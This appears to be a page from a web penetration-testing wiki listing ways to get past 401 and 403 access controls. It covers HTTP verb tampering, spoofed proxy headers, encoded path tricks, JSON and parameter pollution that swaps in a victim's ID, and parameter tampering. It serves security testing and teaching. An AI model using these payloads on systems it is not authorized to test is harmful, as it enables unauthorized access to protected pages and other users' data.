Bypass 401 & 403

In web pentesting, bypassing 401 (Unauthorized) and 403 (Forbidden) errors helps assess security gaps in access controls. Techniques like HTTP verb tampering, HTTP header fuzzing or Path Fuzzing are commonly used to find vulnerabilities and gain unauthorized access.

Bypass 401 & 403

HTTP Verbs Tampering

Try using different verbs to access the file: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

HTTP Headers Fuzzing

Try using HTTP Proxy Headers, HTTP Authentication Basic and NTLM brute-force (with a few combinations only) and other techniques.

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost

If the path is protected you can try to bypass the path protection using these other headers:

X-Original-URL: /admin
X-Rewrite-URL: /admin

Path Fuzzing

If /admin is blocked:

  • Try using /%2e/admin (if access is blocked by a proxy, this could bypass the protection).

  • Try also /%252e/admin (double URL encode)

  • Try Unicode bypass: /%ef%bc%8fadmin (The URL encoded chars are like "/") so when encoded back it will be //admin and maybe you will have already bypassed the /admin name check

Other /admin bypasses:

  • site.com/admin –> HTTP 403 Forbidden

  • site.com/ADMIN –> HTTP 200 OK

  • site.com/admin/ –> HTTP 200 OK

  • site.com/admin/. –> HTTP 200 OK

  • site.com//admin// –> HTTP 200 OK

  • site.com/./admin/.. –> HTTP 200 OK

  • site.com/;/admin –> HTTP 200 OK

  • site.com/.;/admin –> HTTP 200 OK

  • site.com//;//admin –> HTTP 200 OK

  • site.com/admin.json –> HTTP 200 OK (ruby)

Use all this list in the following situations:

  • /FUZZsecret

  • /FUZZ/secret

  • /secretFUZZ

Some API bypasses:

  • /v3/users_data/1234 –> 403 Forbidden

  • /v1/users_data/1234 –> 200 OK

  • {β€œid”:111}-> 401 Unauthriozied

  • {β€œid”:[111]}-> 200 OK

  • {β€œid”:111}-> 401 Unauthriozied

  • {β€œid”:{β€œid”:111}} -> 200 OK

  • {"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameter Pollution)

  • user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution)

Parameter Manipulation

  • Change param value: From id=123 --> id=124

  • Add additional parameters to the URL: ?id=124 β€”-> id=124&isAdmin=true

  • Remove the parameters

  • Re-order parameters

  • Use special characters

  • Perform boundary testing in the parameters β€” provide values like -234 or 0 or 99999999

Protocol version

If using HTTP/1.1 try to use 1.0 or even test if it supports 2.0.

PreviousHTTP Verb TamperingNextEvading WAFs

Last updated

Was this helpful?